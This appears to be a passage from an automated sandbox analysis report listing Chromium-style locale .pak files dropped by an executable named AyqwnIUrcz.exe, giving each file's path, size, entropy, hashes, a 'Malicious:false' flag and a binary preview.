                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\af.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):377708
                                                                                                                                                                      Entropy (8bit):5.4079285675542845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                      MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                      SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                      SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                      SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........E...h.....i.....j.....k.....l.....n."...o.'...p.4...r.:...s.K...t.T...v.i...w.v...y.|...z.....|.....}.....................................................................................-.....>.....E.....N.....g.....p.....{...................................................../.....?.....K.....X.....y...........................................................<.....R.....W.....].....l.....y.....}.....................................................+.....9.....A.....I.....P.....U.....c.....s...............................................%.....J.....d.....m.....y...........................................................+.....2.....5.....6.....B.....L.....V.....].....g.............................O.....^.....k.................................................................".....5.....Q.....z....................................... .....".....%.....(.$...*.D...+.G...,.e........./.....0.....1.....3.....4.....5.....6.D...7.U...8.j...9.y...<.....=.....>.....?.....@.....A.....C.$...D.+.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\am.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):613642
                                                                                                                                                                      Entropy (8bit):4.894733266944232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                      MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                      SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                      SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                      SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........W...h.....i.....j.'...k.6...l.A...n.I...o.N...p.[...r.a...s.r...t.{...v.....w.....y.....z.....|.....}.........................................................................7.....S.....i.........................................L.....k.....m.....q...................................1.....A.....`.............................".....4.....=.....\.....~...................................5.....Q.....W.....Z.....i.............................K.....z.....................................................8.....G.....`.............................".........................................>.....A.....s.............................@.....G.....J.....K.....W.....`.....|.......................<............................./.....g.....w...............................................3.......................E.....j.....p.....x..................... .....".....%.6...(.c...*.....+.....,.........../.....0.....1.]...3.y...4.....5.....6.K...7.s...8.....9.....;.....<.....=.....>.?...?.I...@.i...A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ar.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):671738
                                                                                                                                                                      Entropy (8bit):4.903433286644294
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                      MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                      SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                      SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                      SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........*...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.!...v.6...w.C...y.I...z.X...|.^...}.p.....x.....}.................................................................'.....^.....n...................................'.....*...........V.....x.........................................G.....].....p...............................................o...................................................../.....Q.....s.......................(....._.....i.....q.....x.............................#.....:.....m.......................).....Z.....k.........................................$.....?.....U.....k...........................................................p.................7.....L.....h.......................!.....1.....9.....E.....g.......................&.....Z............................................. .'...".D...%.x...(.....*.....+.....,.6.....M.../.~...0.....1.....3.....4.....5.,...6.....7.....8.....9.....;.....<.:...=.P...>.....?.....@.....A.....C.....D.....E.!...F._.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\bg.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):701716
                                                                                                                                                                      Entropy (8bit):4.66095894344634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                      MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                      SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                      SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                      SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........P...h.....i.....j.....k.%...l.0...n.8...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.........................................................................F.....h...............................................[.........................................#.....Q.....x...................................[.........................................T...............................................'.....U......................./.....c...............................................>.....s.............................4.....^................. .....9.....V.....l...................................\...............................................&.....B.....S.....v...............................................O.....r...................................0.......................9.....z.......................-.....[............... .....".....%.....(.E...*.q...+.t...,.........../.....0.....1.....3.....4.....5.....6.....7.....8.....9.....;.3...<.G...=._...>.....?.....@.....A.....C.F.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\bn.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):904943
                                                                                                                                                                      Entropy (8bit):4.273773274227575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                      MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                      SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                      SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                      SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........K...h.....i.....j.....k.$...l./...n.7...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.............................................................................................................7.....a.......................".....$.....(.....P.......................+.....T.....p.......................H...................................M.....c...........5.....D....._.........................................A.....z.................B.......................................................................H.....a.....s.........................................B.....g.............................3.....W.....{...............................................>...........j...................................6.....R.........................................g...........9.....u...........V...................................8... .M...".....%.....(. ...*.\...,._........./.....0.....1.`...3.....4.....5.....6.....7.....8.E...9.d...;.....<.....=.....>."...?.5...@.j...A.....C.3...D.S.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ca.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426906
                                                                                                                                                                      Entropy (8bit):5.400864409916039
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                      MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                      SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                      SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                      SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........N...h.....i.....j.....k.!...l.,...n.4...o.9...p.F...r.L...s.]...t.f...v.{...w.....y.....z.....|.....}...............................................................................6.....O.....o.....|.....................................................2.....J.....j.....q...........................................................1.....;.....M.....].......................................................................D.....i.................................................................+.....2.....?.....u.........................................".....5.....F.....b.....e.....}.............................................................................&.....h......................./.....P.....s.....................................................4.....P.....|...............................................:.....F... .Q...".g...%.....(.....*.....+.....,.........../.-...0.2...1.h...3.x...4.....5.....6.....7.....8.....9.(...;.6...<.D...=.R...>.l...?.v...@.....A.....C.....D.....E...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\cs.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):436202
                                                                                                                                                                      Entropy (8bit):5.843819816549512
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                      MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                      SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                      SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                      SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......../...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w.........................................................................................#.....,.....9.....V.....d.........................................!.....?.....L.....X.....d.....o.....................................................".....4.....E.....{.......................................................................8.....O.....d.....{.................................................................H.....Z.....h.....................................................9.....<.....J.....X.....h.....w.................................................................!.....p.......................".....>.....s.....................................................&.....N.....n.........................................+.....5... .=...".N...%.u...(.....*.....+.....,.........../.....0.....1.H...3.V...4.s...5.....6.....7.....8.....9.....<."...=.,...>.A...?.I...@.[...A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\da.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):396104
                                                                                                                                                                      Entropy (8bit):5.454826678090317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                      MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                      SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                      SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                      SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........[...h.....i.)...j.5...k.D...l.O...n.W...o.\...p.i...r.o...s.....t.....v.....w.....y.....z.....|.....}.........................................................................?.....M.....].....q.....y...........................................................4.....K.....R.....].....m.....t...........................................................5.....F.....u.............................................................................9.....T.....m.....w.....z................................................................./.....E.....k.............................................................................+.....2.....5.....6.....=.....F.....L.....S.....^.............................X.....n.......................................................................F.....[................................................... .....".....%.,...(.T...*.....+.....,.........../.....0.....1.....3.....4.%...5.=...6.o...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.%...C.B...D.L.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\de.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):424277
                                                                                                                                                                      Entropy (8bit):5.503137231857292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                      MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                      SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                      SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                      SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.V...i.g...j.s...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.............#.....+.....3.....;.....B.....I.....P.....Q.....R.....T...........................................................$.....:.....<.....@.....h.....}.....................................................-.....Q.....d.....j.....s...............................................4.....K.....O.....R.....[.....t...................................D.....Q.....[.....c.....j.....p.....}...............................................0.....d.................................................................6.....O.....i.....p.....s.....t.....~...................................=...................................6.....?.....Q.....[.....h.....m.....r...................................(.....Y.....u.....{........................... .....".....%.....(.....*./...+.2...,.P.....a.../.w...0.....1.....3.....4.....5.....6.A...7.U...8.i...9.w...;.....<.....=.....>.....?.....@.....A.....C.....D.%.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\el.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):769050
                                                                                                                                                                      Entropy (8bit):4.75072843480339
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                      MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                      SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                      SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                      SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........M...h.....i.....j.....k.....l.(...n.0...o.5...p.B...r.H...s.Y...t.b...v.w...w.....y.....z.....|.....}.........................................................................P.....w.............................B.....N.....Z...................................+.....x...................................h.....y.............................&.....C.....a.................,.....4.....H.....o...................................!.....M.................8...............................................1....._.....w.................!.....2.....q.................J.....a.........................................,.....O.....|.........................................!.....3.....F.....^.......................,.................<.............................(.....;.....I.......................M.................T.................................../... .B...".e...%.....(.....*.7...+.:...,.X........./.....0.....1.m...3.....4.....5.#...6.....7.....8.....9. ...;.a...<.w...=.....>.....?.....@.....A.B...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\en-GB.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):344606
                                                                                                                                                                      Entropy (8bit):5.5169703217013675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:80kjE55JcUnMP9egFXwqfaYnT9Xa5alSeBNdg:80kQJZnM1XwWT05YScg
                                                                                                                                                                      MD5:D59E613E8F17BDAFD00E0E31E1520D1F
                                                                                                                                                                      SHA1:529017D57C4EFED1D768AB52E5A2BC929FDFB97C
                                                                                                                                                                      SHA-256:90E585F101CF0BB77091A9A9A28812694CEE708421CE4908302BBD1BC24AC6FD
                                                                                                                                                                      SHA-512:29FF3D42E5D0229F3F17BC0ED6576C147D5C61CE2BD9A2E658A222B75D993230DE3CE35CA6B06F5AFA9EA44CFC67817A30A87F4FAF8DC3A5C883B6EE30F87210
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........h.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w...........................................................................................................3.....;.....E.....c.....t.....v.....z...........................................................+.....:.....T.....g.....k.....q...................................................................................,.....:.....S.....h.....{.......................................................................+.....5.....A.....X.....h.................................................................(.....=.....R.....f.....m.....p.....q.....x..................................................... .....P.....].....h.......................................................................-.....D.....l....................................... .....".....%.....(.....*.....+.....,./.....@.../.N...0.W...1.....3.....4.....5.....6.....7.....8.....9.(...;.9...<.A...=.L...>.a...?.i...@.x...A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\en-US.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):347111
                                                                                                                                                                      Entropy (8bit):5.508989875739037
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:xiLqIY2MuZYLMMP9ecGmM8faYdY4K55TiSbn8vMwS:xiLqIp34MM+mM0Y55eSKMwS
                                                                                                                                                                      MD5:5E3813E616A101E4A169B05F40879A62
                                                                                                                                                                      SHA1:615E4D94F69625DDA81DFAEC7F14E9EE320A2884
                                                                                                                                                                      SHA-256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
                                                                                                                                                                      SHA-512:764A271A9CFB674CCE41EE7AED0AD75F640CE869EFD3C865D1B2D046C9638F4E8D9863A386EBA098F5DCEDD20EA98BAD8BCA158B68EB4BDD606D683F31227594
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........:.h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................6.....C.....R.....b.....i.....r.................................................................#...........>.....E.....Q.....l.....~.................................................................2.....:.....F.....S.....W.....Z.....`.....p...................................................................................:.....A.....P...........................................................'.....5.....H.....K.....\.....l.....|...................................................................................E.....m.....t.......................................................................0.....I.....m......................................................... .....".....%.3...(.J...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.J...7.Z...8.o...9.|...;.....<.....=.....>.....?.....@.....A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\es-419.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):421147
                                                                                                                                                                      Entropy (8bit):5.3798866108688905
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:34e5fql0vt1s9zjzVMY/6+yN9d8piKkGp2Ioiw/QbuOXV5blUB0GLF96RRIHKxgY:34e5Sktm92Yfhpjq+5wLF96oSdc4
                                                                                                                                                                      MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
                                                                                                                                                                      SHA1:36C1C44404EE48FC742B79173F2C7699E1E0301F
                                                                                                                                                                      SHA-256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
                                                                                                                                                                      SHA-512:B226F94F00978F87B7915004A13CDBD23DE2401A8AFAA2517498538967DF89B735F8ECC46870C92E3022CAC795218A60AD2B8FFF1EFAD9FEEA4EC193704A568A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........b...h.&...i./...j.;...k.J...l.U...n.]...o.b...p.o...r.u...s.....t.....v.....w.....y.....z.....|.....}.........................................................................B.....T.....c.....x.................................................................I.....c.....k.....y............................................... .....%.....-.....?.....c.....t...........................................................2.....M.....d...............................................#.....6.....E.....W.....o.....w.........................................B.....N.....a.....m...........................................................$.....'.....(.....1.....:.....C.....J.....[.................2.....:.........................................+.....6.....?.....D.....]...................................@.....Y....._.....g.....u............... .....".....%.....(.....*.....+.....,.<.....b.../.....0.....1.....3.....4.....5.....6.[...7.m...8.....9.....;.....<.....=.....>.....?.....@.....A.1...C.X...D.b.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\es.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):421332
                                                                                                                                                                      Entropy (8bit):5.349883254359391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:fILAyMcQXU0+/3IgsC5pN+v6Idj3J5Orj7FQoz7L66PZqS:ALAyNQCsupUv6gj3J5OrmoznGS
                                                                                                                                                                      MD5:A36992D320A88002697DA97CD6A4F251
                                                                                                                                                                      SHA1:C1F88F391A40CCF2B8A7B5689320C63D6D42935F
                                                                                                                                                                      SHA-256:C5566B661675B613D69A507CBF98768BC6305B80E6893DC59651A4BE4263F39D
                                                                                                                                                                      SHA-512:9719709229A4E8F63247B3EFE004ECFEB5127F5A885234A5F78EE2B368F9E6C44EB68A071E26086E02AA0E61798B7E7B9311D35725D3409FFC0E740F3AA3B9B5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........Z...h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................:.....M.....].....r...........................................................(.....G.....a.....i.....w.....................................................!.....).....;.....N....._.................................................................3.....S.....}............................................... .....-.....>.....V.....^.....o...................................5.....@.....J.....V.....h.............................................................................'.....0.....7.....H.................3.....;.........................................+.....6.....B.....G....._.........................................G.....M.....U.....c............... .....".....%.....(.....*.....+.....,.).....C.../.]...0.d...1.....3.....4.....5.....6.6...7.G...8.\...9.n...;.....<.....=.....>.....?.....@.....A.....C.1...D.;.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\et.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):380687
                                                                                                                                                                      Entropy (8bit):5.464870724176939
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:2Mg++J/xRN0JLnrC4HFJbT/RauiQ/G5LjR43f7LQkPQW:2MmJnq7DG5LjQ
                                                                                                                                                                      MD5:A94E1775F91EA8622F82AE5AB5BA6765
                                                                                                                                                                      SHA1:FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB
                                                                                                                                                                      SHA-256:1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
                                                                                                                                                                      SHA-512:A2575D2BD50494310E8EF9C77D6C1749420DFBE17A91D724984DF025C47601976AF7D971ECAE988C99723D53F240E1A6B3B7650A17F3B845E3DAEEFAAF9FE9B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....l.....|...............................................,.....B.....D.....H.....p.................................................................5.....B.....H.....P.....^.....m.....v.......................................................................-.....F.....Z.....o.......................................................................0.....=.....W.....e.................................................................-.....B.....V.....m.....t.....w.....x...............................................U.....[...............................................$.....).....,.....<.....b.....x.........................................$.....6.....O.....Z... .d...".w...%.....(.....*.....+.....,....... .../.8...0.E...1.n...3.y...4.....5.....6.....7.....8.....9.+...;.>...<.K...=.T...>.g...?.o...@.~...A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\fa.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):622184
                                                                                                                                                                      Entropy (8bit):5.029655615738747
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:Kxw5iX9nuyaXTfwHxwNUWGOGfStQEvy1zeItDmNtua/1wMTAKzIxRAQiHedNu36/:Kxw5YuyaXTfwRwNUWGOGfStQEvy1zeIR
                                                                                                                                                                      MD5:9D273AF70EAFD1B5D41F157DBFB94FDC
                                                                                                                                                                      SHA1:DA98BDE34B59976D4514FF518BD977A713EA4F2E
                                                                                                                                                                      SHA-256:319D1E20150D4E3F496309BA82FCE850E91378EE4B0C7119A003A510B14F878B
                                                                                                                                                                      SHA-512:0A892071BEA92CC7F1A914654BC4F9DA6B9C08E3CB29BB41E9094F6120DDC7A08A257C0D2B475C98E7CDCF604830E582CF2A538CC184056207F196FFC43F29AD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.z...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|."...}.4.....<.....A.....I.....Q.....Y.....`.....g.....n.....p.....u.............................,.....5.....].....k.....u...................................A.....p.....v...................................E.....`.........................................T.....y.....................................................8.....W.......................+.....F.....N.....V.....].....g.....x.............................+.....B....._.............................3.....B.....\.....r.........................................-.....J.....Q.....T.....e.....v.....................................................s............................./.....7.....J.....V.....b.......................$.....J.....w...................................G.....Z... .m...".....%.....(.....*.(...+.+...,.I.....m.../.....0.....1.....3.....4.+...5._...6.....7.....8.....9.G...;.W...<.i...=.}...>.....?.....@.....A.....C.V...D.}...E...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\fi.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):389118
                                                                                                                                                                      Entropy (8bit):5.427253181023048
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:nEbM+RtZ9eC6cMkohGZxGseSFOE/xaWEkLl5W5ucHiEi18OWUcrOShPGNgX1wL2:V+/upPgZxaS5W5xHiEi18OWUsU2
                                                                                                                                                                      MD5:D4B776267EFEBDCB279162C213F3DB22
                                                                                                                                                                      SHA1:7236108AF9E293C8341C17539AA3F0751000860A
